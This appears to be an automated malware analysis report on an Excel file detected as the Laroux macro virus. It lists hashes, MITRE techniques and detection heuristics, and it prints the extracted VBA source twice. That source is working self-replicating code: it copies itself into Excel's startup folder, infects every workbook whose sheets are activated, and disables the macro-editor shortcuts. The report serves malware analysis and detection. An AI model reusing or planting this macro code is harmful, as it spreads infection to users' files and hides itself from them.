Office (OLE) malware analysis — malicious · d69d5bee7a6ca0e3

MALICIOUS

Office (OLE)

77.5 KB Created: 2010-04-11 14:19:08 Authoring application: Microsoft Excel First seen: 2015-09-27

MD5: a02114165ae0ff98c8a25089ece6e3f0 SHA-1: 2f6225c3760cca322bf52b48e27768bf815bf832 SHA-256: d69d5bee7a6ca0e3982a9eb6569a35b11d770dc732d2a7c8a00d6ac50c630f6e

88 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The critical ClamAV heuristic and the presence of VBA macros indicate malicious intent. The Auto_Open macro attempts to copy the workbook to the Excel startup directory as 'StartUp.xls', likely to achieve persistence. The script also attempts to register itself to run automatically using Application.OnSheetActivate and Application.OnKey, further reinforcing the persistence goal.

Heuristics 3

ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1482 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1482 bytes
SHA-256: `ef21a95e8103463135e9f03a5807171a2d74eaaca10c098a1a757a9dd5f72d9e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "StartUp" Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = ActiveWorkbook.Name ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = ActiveSheet.Name Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub Sub back() On Error Resume Next Application.OnKey "%{F8}", "StartUp.xls!escape" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnSheetActivate = "StartUp.xls!cop" Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop" Workbooks.Open Application.StartupPath & "\StartUp.xls" End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: ef21a95e8103463135e9f03a5807171a2d74eaaca10c098a1a757a9dd5f72d9e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "StartUp"
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.